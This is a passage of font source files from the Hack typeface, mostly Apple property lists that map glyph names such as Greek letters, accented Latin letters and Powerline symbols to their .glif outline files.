<string>c6461</string> <string>c6468</string> <string>c6470</string> <string>c6472</string> <string>c6477</string> <string>c6478</string> <string>c6475</string> <string>c6476</string> <string>Alpha</string> <string>Beta</string> <string>Gamma</string> <string>Epsilon</string> <string>Zeta</string> <string>Eta</string> <string>Theta</string> <string>Iota</string> <string>Kappa</string> <string>Lambda</string> <string>Mu</string> <string>Nu</string> <string>Xi</string> <string>Omicron</string> <string>Pi</string> <string>Rho</string> <string>Sigma</string> <string>Tau</string> <string>Upsilon</string> <string>Phi</string> <string>Chi</string> <string>Psi</string> <string>uni03A9</string> <string>Alphatonos</string> <string>Epsilontonos</string> <string>Etatonos</string> <string>Iotatonos</string> <string>Omicrontonos</string> <string>Upsilontonos</string> <string>Omegatonos</string> <string>Iotadieresis</string> <string>Upsilondieresis</string> <string>alpha</string> <string>beta</string> <string>gamma</string> <string>delta</string> <string>epsilon</string> <string>zeta</string> <string>eta</string> <string>theta</string> <string>iota</string> <string>kappa</string> <string>lambda</string> <string>nu</string> <string>xi</string> <string>omicron</string> <string>pi</string> <string>rho</string> <string>uni03C2</string> <string>sigma</string> <string>tau</string> <string>upsilon</string> <string>phi</string> <string>chi</string> <string>psi</string> <string>omega</string> <string>iotatonos</string> <string>iotadieresis</string> <string>iotadieresistonos</string> <string>upsilontonos</string> <string>upsilondieresis</string> <string>upsilondieresistonos</string> <string>omicrontonos</string> <string>omegatonos</string> <string>alphatonos</string> <string>epsilontonos</string> <string>etatonos</string> <string>zero.subs</string> <string>one.subs</string> <string>two.subs</string> <string>three.subs</string> <string>four.subs</string> <string>five.subs</string> <string>six.subs</string> <string>seven.subs</string> <string>eight.subs</string> <string>nine.subs</string> <string>uni2155</string> <string>uni2156</string> <string>uni2157</string> <string>uni2158</string> <string>uni2159</string> <string>uni215A</string> <string>uni2150</string> <string>uni2151</string> <string>uni2070</string> <string>uni2074</string> <string>uni2075</string> <string>uni2076</string> <string>uni2077</string> <string>uni2078</string> <string>uni2079</string> <string>guillemotleft</string> <string>guillemotright</string> <string>uni00B5</string> <string>uni2206</string> <string>tonos</string> <string>dieresistonos</string> <string>_1608</string> <string>Aacute</string> <string>Ccircumflex</string> <string>ccircumflex</string> <string>Gcircumflex</string> <string>gcircumflex</string> <string>Hcircumflex</string> <string>hcircumflex</string> <string>Jcircumflex</string> <string>jcircumflex</string> <string>Ubreve</string> <string>ubreve</string> <string>uni20B7</string> <string>Scircumflex</string> <string>scircumflex</string> <string>uni2116</string> <string>uni01A4</string> <string>uni1EF8</string> <string>uni1EF9</string> <string>uni1EBC</string> <string>uni1EBD</string> <string>IJ</string> <string>ij</string> <string>Ldot</string> <string>ldot</string> <string>uni0162</string> <string>uni0163</string> <string>kgreenlandic</string> <string>musicalnote</string> <string>napostrophe</string> <string>uniE0A0</string> <string>uniE0A1</string> <string>uniE0A2</string> <string>uniE0B0</string> <string>uniE0B1</string> <string>uniE0B2</string> <string>uniE0B3</string> </array> </dict> </plist>
Hack/source/Hack-Bold.ufo/metainfo.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>creator</key> <string>com.schriftgestaltung.GlyphsUFOExport</string> <key>formatVersion</key> <integer>2</integer> </dict> </plist>
Hack/source/Hack-Bold.ufo/glyphs/contents.plist
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>.notdef</key> <string>_notdef.glif</string> <key>A</key> <string>A_.glif</string> <key>AE</key> <string>A_E_.glif</string> <key>Aacute</key> <string>A_acute.glif</string> <key>Abreve</key> <string>A_breve.glif</string> <key>Acircumflex</key> <string>A_circumflex.glif</string> <key>Adieresis</key> <string>A_dieresis.glif</string> <key>Agrave</key> <string>A_grave.glif</string> <key>Alpha</key> <string>A_lpha.glif</string> <key>Alphatonos</key> <string>A_lphatonos.glif</string> <key>Amacron</key> <string>A_macron.glif</string> <key>Aogonek</key> <string>A_ogonek.glif</string> <key>Aring</key> <string>A_ring.glif</string> <key>Atilde</key> <string>A_tilde.glif</string> <key>B</key> <string>B_.glif</string> <key>Beta</key> <string>B_eta.glif</string> <key>C</key> <string>C_.glif</string> <key>CR</key> <string>C_R_.glif</string> <key>Cacute</key> <string>C_acute.glif</string> <key>Ccaron</key> <string>C_caron.glif</string> <key>Ccedilla</key> <string>C_cedilla.glif</string> <key>Ccircumflex</key> <string>C_circumflex.glif</string> <key>Cdotaccent</key> <string>C_dotaccent.glif</string> <key>Chi</key> <string>C_hi.glif</string> <key>D</key> <string>D_.glif</string> <key>Dcaron</key> <string>D_caron.glif</string> <key>Dcroat</key> <string>D_croat.glif</string> <key>E</key> <string>E_.glif</string> <key>Eacute</key> <string>E_acute.glif</string> <key>Ecaron</key> <string>E_caron.glif</string> <key>Ecircumflex</key> <string>E_circumflex.glif</string> <key>Edieresis</key> <string>E_dieresis.glif</string> <key>Edotaccent</key> <string>E_dotaccent.glif</string> <key>Egrave</key> <string>E_grave.glif</string> <key>Emacron</key> <string>E_macron.glif</string> <key>Eng</key> <string>E_ng.glif</string> <key>Eogonek</key> <string>E_ogonek.glif</string> <key>Epsilon</key> <string>E_psilon.glif</string> <key>Epsilontonos</key> <string>E_psilontonos.glif</string> <key>Eta</key> <string>E_ta.glif</string> <key>Etatonos</key> <string>E_tatonos.glif</string> <key>Eth</key> <string>E_th.glif</string> <key>Euro</key> <string>E_uro.glif</string> <key>F</key> <string>F_.glif</string> <key>G</key> <string>G_.glif</string> <key>Gamma</key> <string>G_amma.glif</string> <key>Gbreve</key> <string>G_breve.glif</string> <key>Gcaron</key> <string>G_caron.glif</string> <key>Gcircumflex</key> <string>G_circumflex.glif</string> <key>Gdotaccent</key> <string>G_dotaccent.glif</string> <key>H</key> <string>H_.glif</string> <key>Hbar</key> <string>H_bar.glif</string> <key>Hcircumflex</key> <string>H_circumflex.glif</string> <key>I</key> <string>I_.glif</string> <key>IJ</key> <string>I_J_.glif</string> <key>Iacute</key> <string>I_acute.glif</string> <key>Icircumflex</key> <string>I_circumflex.glif</string> <key>Idieresis</key> <string>I_dieresis.glif</string> <key>Idotaccent</key> <string>I_dotaccent.glif</string> <key>Igrave</key> <string>I_grave.glif</string> <key>Imacron</key> <string>I_macron.glif</string> <key>Iogonek</key> <string>I_ogonek.glif</string> <key>Iota</key> <string>I_ota.glif</string> <key>Iotadieresis</key> <string>I_otadieresis.glif</string> <key>Iotatonos</key> <string>I_otatonos.glif</string> <key>Itilde</key> <string>I_tilde.glif</string> <key>J</key> <string>J_.glif</string> <key>Jcircumflex</key> <string>J_circumflex.glif</string> <key>K</key> <string>K_.glif</string> <key>Kappa</key> <string>K_appa.glif</string> <key>L</key> <string>L_.glif</string> <key>Lacute</key> <string>L_acute.glif</string> <key>Lambda</key> <string>L_ambda.glif</string> <key>Lcaron</key> <string>L_caron.glif</string> <key>Ldot</key> <string>L_dot.glif</string> <key>Lslash</key> <string>L_slash.glif</string> <key>M</key> <string>M_.glif</string> <key>Mu</key> <string>M_u.glif</string> <key>N</key> <string>N_.glif</string> <key>NULL</key> <string>N_U_L_L_.glif</string> <key>Nacute</key> <string>N_acute.glif</string> <key>Ncaron</key> <string>N_caron.glif</string> <key>Ntilde</key> <string>N_tilde.glif</string> <key>Nu</key> <string>N_u.glif</string> <key>O</key> <string>O_.glif</string> <key>OE</key> <string>O_E_.glif</string> <key>Oacute</key> <string>O_acute.glif</string> <key>Ocircumflex</key> <string>O_circumflex.glif</string> <key>Odieresis</key> <string>O_dieresis.glif</string> <key>Ograve</key> <string>O_grave.glif</string> <key>Ohorn</key> <string>O_horn.glif</string> <key>Ohungarumlaut</key> <string>O_hungarumlaut.glif</string> <key>Omacron</key> <string>O_macron.glif</string> <key>Omegatonos</key> <string>O_megatonos.glif</string> <key>Omicron</key> <string>O_micron.glif</string> <key>Omicrontonos</key> <string>O_microntonos.glif</string> <key>Oslash</key> <string>O_slash.glif</string> <key>Oslashacute</key> <string>O_slashacute.glif</string> <key>Otilde</key> <string>O_tilde.glif</string> <key>P</key> <string>P_.glif</string> <key>Phi</key> <string>P_hi.glif</string> <key>Pi</key> <string>P_i.glif</string> <key>Psi</key> <string>P_si.glif</string> <key>Q</key> <string>Q_.glif</string> <key>R</key> <string>R_.glif</string> <key>Racute</key> <string>R_acute.glif</string> <key>Rcaron</key> <string>R_caron.glif</string> <key>Rho</key> <string>R_ho.glif</string> <key>S</key> <string>S_.glif</string> <key>Sacute</key> <string>S_acute.glif</string> <key>Scaron</key> <string>S_caron.glif</string> <key>Scedilla</key> <string>S_cedilla.glif</string> <key>Scircumflex</key> <string>S_circumflex.glif</string> <key>Sigma</key> <string>S_igma.glif</string> <key>T</key> <string>T_.glif</string> <key>Tau</key> <string>T_au.glif</string> <key>Tbar</key> <string>T_bar.glif</string> <key>Tcaron</key> <string>T_caron.glif</string> <key>Theta</key> <string>T_heta.glif</string> <key>Thorn</key> <string>T_horn.glif</string> <key>U</key> <string>U_.glif</string> <key>Uacute</key> <string>U_acute.glif</string> <key>Ubreve</key> <string>U_breve.glif</string> <key>Ucircumflex</key> <string>U_circumflex.glif</string> <key>Udieresis</key> <string>U_dieresis.glif</string> <key>Ugrave</key> <string>U_grave.glif</string> <key>Uhorn</key> <string>U_horn.glif</string> <key>Uhungarumlaut</key> <string>U_hungarumlaut.glif</string> <key>Umacron</key> <string>U_macron.glif</string> <key>Uogonek</key> <string>U_ogonek.glif</string> <key>Upsilon</key> <string>U_psilon.glif</string> <key>Upsilondieresis</key> <string>U_psilondieresis.glif</string> <key>Upsilontonos</key> <string>U_psilontonos.glif</string> <key>Uring</key> <string>U_ring.glif</string> <key>Utilde</key> <string>U_tilde.glif</string> <key>V</key> <string>V_.glif</string> <key>W</key> <string>W_.glif</string> <key>Wacute</key> <string>W_acute.glif</string> <key>Wcircumflex</key> <string>W_circumflex.glif</string> <key>Wdieresis</key> <string>W_dieresis.glif</string> <key>Wgrave</key> <string>W_grave.glif</string> <key>X</key> <string>X_.glif</string> <key>Xi</key> <string>X_i.glif</string> <key>Y</key> <string>Y_.glif</string> <key>Yacute</key> <string>Y_acute.glif</string> <key>Ycircumflex</key> <string>Y_circumflex.glif</string> <key>Ydieresis</key> <string>Y_dieresis.glif</string> <key>Ygrave</key> <string>Y_grave.glif</string> <key>Z</key> <string>Z_.glif</string> <key>Zacute</key> <string>Z_acute.glif</string> <key>Zcaron</key> <string>Z_caron.glif</string> <key>Zdotaccent</key> <string>Z_dotaccent.glif</string> <key>Zeta</key> <string>Z_eta.glif</string> <key>_1608</key> <string>_1608.glif</string> <key>a</key> <string>a.glif</string> <key>aacute</key> <string>aacute.glif</string> <key>abreve</key> <string>abreve.glif</string> <key>acircumflex</key> <string>acircumflex.glif</string> <key>acute</key> <string>acute.glif</string> <key>acutecomb</key> <string>acutecomb.glif</string> <key>adieresis</key> <string>adieresis.glif</string> <key>ae</key> <string>ae.glif</string> <key>agrave</key> <string>agrave.glif</string> <key>alpha</key> <string>alpha.glif</string> <key>alphatonos</key> <string>alphatonos.glif</string> <key>amacron</key> <string>amacron.glif</string> <key>ampersand</key> <string>ampersand.glif</string> <key>angle</key> <string>angle.glif</string> <key>aogonek</key> <string>aogonek.glif</string> <key>approxequal</key> <string>approxequal.glif</string> <key>aring</key> <string>aring.glif</string> <key>arrowboth</key> <string>arrowboth.glif</string> <key>arrowdblboth</key> <string>arrowdblboth.glif</string> <key>arrowdbldown</key> <string>arrowdbldown.glif</string> <key>arrowdblleft</key> <string>arrowdblleft.glif</string> <key>arrowdblright</key> <string>arrowdblright.glif</string> <key>arrowdblup</key> <string>arrowdblup.glif</string> <key>arrowdown</key> <string>arrowdown.glif</string> <key>arrowleft</key> <string>arrowleft.glif</string> <key>arrowright</key> <string>arrowright.glif</string> <key>arrowup</key> <string>arrowup.glif</string> <key>arrowupdn</key> <string>arrowupdn.glif</string> <key>arrowupdnbse</key> <string>arrowupdnbse.glif</string> <key>asciicircum</key> <string>asciicircum.glif</string> <key>asciitilde</key> <string>asciitilde.glif</string> <key>asterisk</key> <string>asterisk.glif</string> <key>asteriskmath</key> <string>asteriskmath.glif</string> <key>at</key> <string>at.glif</string> <key>atilde</key> <string>atilde.glif</string> <key>b</key> <string>b.glif</string> <key>backslash</key> <string>backslash.glif</string> <key>bar</key> <string>bar.glif</string> <key>beta</key> <string>beta.glif</string> <key>block</key> <string>block.glif</string> <key>braceleft</key> <string>braceleft.glif</string> <key>braceright</key> <string>braceright.glif</string> <key>bracketleft</key> <string>bracketleft.glif</string> <key>bracketright</key> <string>bracketright.glif</string> <key>breve</key> <string>breve.glif</string> <key>brokenbar</key> <string>brokenbar.glif</string> <key>bullet</key> <string>bullet.glif</string> <key>c</key> <string>c.glif</string> <key>c6459</key> <string>c6459.glif</string> <key>c6460</key> <string>c6460.glif</string> <key>c6461</key> <string>c6461.glif</string> <key>c6468</key> <string>c6468.glif</string> <key>c6470</key> <string>c6470.glif</string> <key>c6472</key> <string>c6472.glif</string> <key>c6475</key> <string>c6475.glif</string> <key>c6476</key> <string>c6476.glif</string> <key>c6477</key> <string>c6477.glif</string> <key>c6478</key> <string>c6478.glif</string> <key>cacute</key> <string>cacute.glif</string> <key>caron</key> <string>caron.glif</string> <key>carriagereturn</key> <string>carriagereturn.glif</string> <key>ccaron</key> <string>ccaron.glif</string> <key>ccedilla</key> <string>ccedilla.glif</string> <key>ccircumflex</key> <string>ccircumflex.glif</string> <key>cdotaccent</key> <string>cdotaccent.glif</string> <key>cedilla</key> <string>cedilla.glif</string> <key>cent</key> <string>cent.glif</string> <key>chi</key> <string>chi.glif</string> <key>circle</key> <string>circle.glif</string> <key>circlemultiply</key> <string>circlemultiply.glif</string> <key>circleplus</key> <string>circleplus.glif</string> <key>circumflex</key> <string>circumflex.glif</string> <key>colon</key> <string>colon.glif</string> <key>colonmonetary</key> <string>colonmonetary.glif</string> <key>comma</key> <string>comma.glif</string> <key>congruent</key> <string>congruent.glif</string> <key>copyright</key> <string>copyright.glif</string> <key>currency</key> <string>currency.glif</string> <key>d</key> <string>d.glif</string> <key>dagger</key> <string>dagger.glif</string> <key>daggerdbl</key> <string>daggerdbl.glif</string> <key>dcaron</key> <string>dcaron.glif</string> <key>dcroat</key> <string>dcroat.glif</string> <key>degree</key> <string>degree.glif</string> <key>delta</key> <string>delta.glif</string> <key>dieresis</key> <string>dieresis.glif</string> <key>dieresistonos</key> <string>dieresistonos.glif</string> <key>divide</key> <string>divide.glif</string> <key>dkshade</key> <string>dkshade.glif</string> <key>dnblock</key> <string>dnblock.glif</string> <key>dollar</key> <string>dollar.glif</string> <key>dong</key> <string>dong.glif</string> <key>dotaccent</key> <string>dotaccent.glif</string> <key>dotbelowcomb</key> <string>dotbelowcomb.glif</string> <key>dotlessi</key> <string>dotlessi.glif</string> <key>dotmath</key> <string>dotmath.glif</string> <key>e</key> <string>e.glif</string> <key>eacute</key> <string>eacute.glif</string> <key>ecaron</key> <string>ecaron.glif</string> <key>ecircumflex</key> <string>ecircumflex.glif</string> <key>edieresis</key> <string>edieresis.glif</string> <key>edotaccent</key> <string>edotaccent.glif</string> <key>egrave</key> <string>egrave.glif</string> <key>eight</key> <string>eight.glif</string> <key>eight.subs</key> <string>eight.subs.glif</string> <key>element</key> <string>element.glif</string> <key>onedotenleader</key> <string>onedotenleader.glif</string> <key>twodotenleader</key> <string>twodotenleader.glif</string> <key>ellipsis</key> <string>ellipsis.glif</string> <key>emacron</key> <string>emacron.glif</string> <key>Ebreve</key> <string>E_breve.glif</string> <key>ebreve</key> <string>ebreve.glif</string> <key>emdash</key> <string>emdash.glif</string> <key>emptyset</key> <string>emptyset.glif</string> <key>endash</key> <string>endash.glif</string> <key>eng</key> <string>eng.glif</string> <key>eogonek</key> <string>eogonek.glif</string> <key>epsilon</key> <string>epsilon.glif</string> <key>epsilontonos</key> <string>epsilontonos.glif</string> <key>equal</key> <string>equal.glif</string> <key>equivalence</key> <string>equivalence.glif</string> <key>eta</key> <string>eta.glif</string> <key>etatonos</key> <string>etatonos.glif</string> <key>eth</key> <string>eth.glif</string> <key>exclam</key> <string>exclam.glif</string> <key>exclamdbl</key> <string>exclamdbl.glif</string> <key>exclamdown</key> <string>exclamdown.glif</string> <key>exclamdown.case</key> <string>exclamdown.case.glif</string> <key>existential</key> <string>existential.glif</string> <key>f</key> <string>f.glif</string> <key>figuredash</key> <string>figuredash.glif</string> <key>filledbox</key> <string>filledbox.glif</string> <key>filledrect</key> <string>filledrect.glif</string> <key>five</key> <string>five.glif</string> <key>five.subs</key> <string>five.subs.glif</string> <key>fiveeighths</key> <string>fiveeighths.glif</string> <key>florin</key> <string>florin.glif</string> <key>four</key> <string>four.glif</string> <key>four.subs</key> <string>four.subs.glif</string> <key>fraction</key> <string>fraction.glif</string> <key>franc</key> <string>franc.glif</string> <key>g</key> <string>g.glif</string> <key>gamma</key> <string>gamma.glif</string> <key>gbreve</key> <string>gbreve.glif</string> <key>gcaron</key> <string>gcaron.glif</string> <key>gcircumflex</key> <string>gcircumflex.glif</string> <key>gdotaccent</key> <string>gdotaccent.glif</string> <key>germandbls</key> <string>germandbls.glif</string> <key>gradient</key> <string>gradient.glif</string> <key>grave</key> <string>grave.glif</string> <key>gravecomb</key> <string>gravecomb.glif</string> <key>greater</key> <string>greater.glif</string> <key>greaterequal</key> <string>greaterequal.glif</string> <key>guillemotleft</key> <string>guillemotleft.glif</string> <key>guillemotright</key> <string>guillemotright.glif</string> <key>guilsinglleft</key> <string>guilsinglleft.glif</string> <key>guilsinglright</key> <string>guilsinglright.glif</string> <key>h</key> <string>h.glif</string> <key>hbar</key> <string>hbar.glif</string> <key>hcircumflex</key> <string>hcircumflex.glif</string> <key>hookabovecomb</key> <string>hookabovecomb.glif</string> <key>hungarumlaut</key> <string>hungarumlaut.glif</string> <key>hyphen</key> <string>hyphen.glif</string> <key>i</key> <string>i.glif</string> <key>iacute</key> <string>iacute.glif</string> <key>icircumflex</key> <string>icircumflex.glif</string> <key>idieresis</key> <string>idieresis.glif</string> <key>igrave</key> <string>igrave.glif</string> <key>ij</key> <string>ij.glif</string> <key>imacron</key> <string>imacron.glif</string> <key>Ibreve</key> <string>I_breve.glif</string> <key>ibreve</key> <string>ibreve.glif</string> <key>infinity</key> <string>infinity.glif</string> <key>integral</key> <string>integral.glif</string> <key>integralbt</key> <string>integralbt.glif</string> <key>integraltp</key> <string>integraltp.glif</string> <key>intersection</key> <string>intersection.glif</string> <key>invbullet</key> <string>invbullet.glif</string> <key>invcircle</key> <string>invcircle.glif</string> <key>iogonek</key> <string>iogonek.glif</string> <key>iota</key> <string>iota.glif</string> <key>iotadieresis</key> <string>iotadieresis.glif</string> <key>iotadieresistonos</key> <string>iotadieresistonos.glif</string> <key>iotatonos</key> <string>iotatonos.glif</string> <key>itilde</key> <string>itilde.glif</string> <key>j</key> <string>j.glif</string> <key>jcircumflex</key> <string>jcircumflex.glif</string> <key>k</key> <string>k.glif</string> <key>kappa</key> <string>kappa.glif</string> <key>kgreenlandic</key> <string>kgreenlandic.glif</string> <key>l</key> <string>l.glif</string> <key>lacute</key> <string>lacute.glif</string> <key>lambda</key> <string>lambda.glif</string> <key>lcaron</key> <string>lcaron.glif</string> <key>ldot</key> <string>ldot.glif</string> <key>less</key> <string>less.glif</string> <key>lessequal</key> <string>lessequal.glif</string> <key>lfblock</key> <string>lfblock.glif</string> <key>lira</key> <string>lira.glif</string> <key>logicaland</key> <string>logicaland.glif</string> <key>logicalnot</key> <string>logicalnot.glif</string> <key>logicalor</key> <string>logicalor.glif</string> <key>longs</key> <string>longs.glif</string> <key>lozenge</key> <string>lozenge.glif</string> <key>lslash</key> <string>lslash.glif</string> <key>ltshade</key> <string>ltshade.glif</string> <key>m</key> <string>m.glif</string> <key>macron</key> <string>macron.glif</string> <key>minus</key> <string>minus.glif</string> <key>multiply</key> <string>multiply.glif</string> <key>musicalnote</key> <string>musicalnote.glif</string> <key>n</key> <string>n.glif</string> <key>nacute</key> <string>nacute.glif</string> <key>napostrophe</key> <string>napostrophe.glif</string> <key>ncaron</key> <string>ncaron.glif</string> <key>nine</key> <string>nine.glif</string> <key>nine.subs</key> <string>nine.subs.glif</string> <key>notelement</key> <string>notelement.glif</string> <key>notequal</key> <string>notequal.glif</string> <key>notsubset</key> <string>notsubset.glif</string> <key>ntilde</key> <string>ntilde.glif</string> <key>nu</key> <string>nu.glif</string> <key>numbersign</key> <string>numbersign.glif</string> <key>o</key> <string>o.glif</string> <key>oacute</key> <string>oacute.glif</string> <key>ocircumflex</key> <string>ocircumflex.glif</string> <key>odieresis</key> <string>odieresis.glif</string> <key>oe</key> <string>oe.glif</string> <key>ogonek</key> <string>ogonek.glif</string> <key>ograve</key> <string>ograve.glif</string> <key>ohorn</key> <string>ohorn.glif</string> <key>ohungarumlaut</key> <string>ohungarumlaut.glif</string> <key>omacron</key> <string>omacron.glif</string> <key>Obreve</key> <string>O_breve.glif</string> <key>obreve</key> <string>obreve.glif</string> <key>omega</key> <string>omega.glif</string> <key>omegatonos</key> <string>omegatonos.glif</string> <key>omicron</key> <string>omicron.glif</string> <key>omicrontonos</key> <string>omicrontonos.glif</string> <key>one</key> <string>one.glif</string> <key>one.subs</key> <string>one.subs.glif</string> <key>oneeighth</key> <string>oneeighth.glif</string> <key>onehalf</key> <string>onehalf.glif</string> <key>onequarter</key> <string>onequarter.glif</string> <key>openbullet</key> <string>openbullet.glif</string> <key>ordfeminine</key> <string>ordfeminine.glif</string> <key>ordmasculine</key> <string>ordmasculine.glif</string> <key>orthogonal</key> <string>orthogonal.glif</string> <key>oslash</key> <string>oslash.glif</string> <key>oslashacute</key> <string>oslashacute.glif</string> <key>otilde</key> <string>otilde.glif</string> <key>p</key> <string>p.glif</string> <key>paragraph</key> <string>paragraph.glif</string> <key>parenleft</key> <string>parenleft.glif</string> <key>parenright</key> <string>parenright.glif</string> <key>partialdiff</key> <string>partialdiff.glif</string> <key>percent</key> <string>percent.glif</string> <key>period</key> <string>period.glif</string> <key>periodcentered</key> <string>periodcentered.glif</string> <key>perthousand</key> <string>perthousand.glif</string> <key>peseta</key> <string>peseta.glif</string> <key>phi</key> <string>phi.glif</string> <key>pi</key> <string>pi.glif</string> <key>plus</key> <string>plus.glif</string> <key>plusminus</key> <string>plusminus.glif</string> <key>product</key> <string>product.glif</string> <key>propersubset</key> <string>propersubset.glif</string> <key>propersuperset</key> <string>propersuperset.glif</string> <key>proportional</key> <string>proportional.glif</string> <key>psi</key> <string>psi.glif</string> <key>q</key> <string>q.glif</string> <key>question</key> <string>question.glif</string> <key>questiondown</key> <string>questiondown.glif</string> <key>questiondown.case</key> <string>questiondown.case.glif</string> <key>quotedbl</key> <string>quotedbl.glif</string> <key>quotedblbase</key> <string>quotedblbase.glif</string> <key>quotedblleft</key> <string>quotedblleft.glif</string> <key>quotedblright</key> <string>quotedblright.glif</string> <key>quoteleft</key> <string>quoteleft.glif</string> <key>quotereversed</key> <string>quotereversed.glif</string> <key>quoteright</key> <string>quoteright.glif</string> <key>quotesinglbase</key> <string>quotesinglbase.glif</string> <key>quotesingle</key> <string>quotesingle.glif</string> <key>r</key> <string>r.glif</string> <key>racute</key> <string>racute.glif</string> <key>radical</key> <string>radical.glif</string> <key>rcaron</key> <string>rcaron.glif</string> <key>reflexsubset</key> <string>reflexsubset.glif</string> <key>reflexsuperset</key> <string>reflexsuperset.glif</string> <key>registered</key> <string>registered.glif</string> <key>revlogicalnot</key> <string>revlogicalnot.glif</string> <key>rho</key> <string>rho.glif</string> <key>ring</key> <string>ring.glif</string> <key>rtblock</key> <string>rtblock.glif</string> <key>s</key> <string>s.glif</string> <key>sacute</key> <string>sacute.glif</string> <key>scaron</key> <string>scaron.glif</string> <key>scedilla</key> <string>scedilla.glif</string> <key>scircumflex</key> <string>scircumflex.glif</string> <key>section</key> <string>section.glif</string> <key>semicolon</key> <string>semicolon.glif</string> <key>seven</key> <string>seven.glif</string> <key>seven.subs</key> <string>seven.subs.glif</string> <key>seveneighths</key> <string>seveneighths.glif</string> <key>shade</key> <string>shade.glif</string> <key>sigma</key> <string>sigma.glif</string> <key>similar</key> <string>similar.glif</string> <key>six</key> <string>six.glif</string> <key>six.subs</key> <string>six.subs.glif</string> <key>slash</key> <string>slash.glif</string> <key>space</key> <string>space.glif</string> <key>sterling</key> <string>sterling.glif</string> <key>suchthat</key> <string>suchthat.glif</string> <key>summation</key> <string>summation.glif</string> <key>t</key> <string>t.glif</string> <key>tau</key> <string>tau.glif</string> <key>tbar</key> <string>tbar.glif</string> <key>tcaron</key> <string>tcaron.glif</string> <key>therefore</key> <string>therefore.glif</string> <key>theta</key> <string>theta.glif</string> <key>thorn</key> <string>thorn.glif</string> <key>three</key> <string>three.glif</string> <key>three.subs</key> <string>three.subs.glif</string> <key>threeeighths</key> <string>threeeighths.glif</string> <key>threequarters</key> <string>threequarters.glif</string> <key>tilde</key> <string>tilde.glif</string> <key>tildecomb</key> <string>tildecomb.glif</string> <key>tonos</key> <string>tonos.glif</string> <key>trademark</key> <string>trademark.glif</string> <key>triagdn</key> <string>triagdn.glif</string> <key>triaglf</key> <string>triaglf.glif</string> <key>triagrt</key> <string>triagrt.glif</string> <key>triagup</key> <string>triagup.glif</string> <key>two</key> <string>two.glif</string> <key>two.subs</key> <string>two.subs.glif</string> <key>u</key> <string>u.glif</string> <key>uacute</key> <string>uacute.glif</string> <key>ubreve</key> <string>ubreve.glif</string> <key>ucircumflex</key> <string>ucircumflex.glif</string> <key>udieresis</key> <string>udieresis.glif</string> <key>ugrave</key> <string>ugrave.glif</string> <key>uhorn</key> <string>uhorn.glif</string> <key>uhungarumlaut</key> <string>uhungarumlaut.glif</string> <key>umacron</key> <string>umacron.glif</string> <key>underscore</key> <string>underscore.glif</string> <key>underscoredbl</key> <string>underscoredbl.glif</string> <key>uni00A0</key> <string>uni00A_0.glif</string> <key>uni00AD</key> <string>uni00A_D_.glif</string> <key>uni00B2</key> <string>uni00B_2.glif</string> <key>uni00B3</key> <string>uni00B_3.glif</string> <key>uni00B5</key> <string>uni00B_5.glif</string> <key>uni00B9</key> <string>uni00B_9.glif</string> <key>uni0122</key> <string>uni0122.glif</string> <key>uni0123</key> <string>uni0123.glif</string> <key>uni0136</key> <string>uni0136.glif</string> <key>uni0137</key> <string>uni0137.glif</string> <key>uni013B</key> <string>uni013B_.glif</string> <key>uni013C</key> <string>uni013C_.glif</string> <key>uni0145</key> <string>uni0145.glif</string> <key>uni0146</key> <string>uni0146.glif</string> <key>uni0156</key> <string>uni0156.glif</string> <key>uni0157</key> <string>uni0157.glif</string> <key>uni0162</key> <string>uni0162.glif</string> <key>uni0163</key> <string>uni0163.glif</string> <key>uni01A4</key> <string>uni01A_4.glif</string> <key>uni0218</key> <string>uni0218.glif</string> <key>uni0219</key> <string>uni0219.glif</string> <key>uni021A</key> <string>uni021A_.glif</string> <key>uni021B</key> <string>uni021B_.glif</string> <key>uni02B9</key> <string>uni02B_9.glif</string> <key>uni02BB</key> <string>uni02B_B_.glif</string> <key>uni02BC</key> <string>uni02B_C_.glif</string> <key>uni02BD</key> <string>uni02B_D_.glif</string> <key>uni02BE</key> <string>uni02B_E_.glif</string> <key>uni02BF</key> <string>uni02B_F_.glif</string> <key>uni02C0</key> <string>uni02C_0.glif</string> <key>uni02C1</key> <string>uni02C_1.glif</string> <key>uni02C8</key> <string>uni02C_8.glif</string> <key>uni02C9</key> <string>uni02C_9.glif</string> <key>uni02CC</key> <string>uni02C_C_.glif</string> <key>uni02CD</key> <string>uni02C_D_.glif</string> <key>uni02CE</key> <string>uni02C_E_.glif</string> <key>uni02CF</key> <string>uni02C_F_.glif</string> <key>uni02D0</key> <string>uni02D_0.glif</string> <key>uni02D1</key> <string>uni02D_1.glif</string> <key>uni0302</key> <string>uni0302.glif</string> <key>uni0304</key> <string>uni0304.glif</string> <key>uni0304.case</key> <string>uni0304.case.glif</string> <key>uni0305</key> <string>uni0305.glif</string> <key>uni0306</key> <string>uni0306.glif</string> <key>uni0306.case</key> <string>uni0306.case.glif</string> <key>uni0307</key> <string>uni0307.glif</string> <key>uni0307.case</key> <string>uni0307.case.glif</string> <key>uni0308</key> <string>uni0308.glif</string> <key>uni030A</key> <string>uni030A_.glif</string> <key>uni030B</key> <string>uni030B_.glif</string> <key>uni030B.case</key> <string>uni030B_.case.glif</string> <key>uni030C</key> <string>uni030C_.glif</string> <key>uni030D</key> <string>uni030D_.glif</string> <key>uni030E</key> <string>uni030E_.glif</string> <key>uni030F</key> <string>uni030F_.glif</string> <key>uni030F.case</key> <string>uni030F_.case.glif</string> <key>uni0310</key> <string>uni0310.glif</string> <key>uni0311</key> <string>uni0311.glif</string> <key>uni0311.case</key> <string>uni0311.case.glif</string> <key>uni0312</key> <string>uni0312.glif</string> <key>uni0313</key> <string>uni0313.glif</string> <key>uni0314</key> <string>uni0314.glif</string> <key>uni0315</key> <string>uni0315.glif</string> <key>uni0316</key> <string>uni0316.glif</string> <key>uni0317</key> <string>uni0317.glif</string> <key>uni0318</key> <string>uni0318.glif</string> <key>uni0319</key> <string>uni0319.glif</string> <key>uni031A</key> <string>uni031A_.glif</string> <key>uni031B</key> <string>uni031B_.glif</string> <key>uni031C</key> <string>uni031C_.glif</string> <key>uni031D</key> <string>uni031D_.glif</string> <key>uni031E</key> <string>uni031E_.glif</string> <key>uni031F</key> <string>uni031F_.glif</string> <key>uni0320</key> <string>uni0320.glif</string> <key>uni0321</key> <string>uni0321.glif</string> 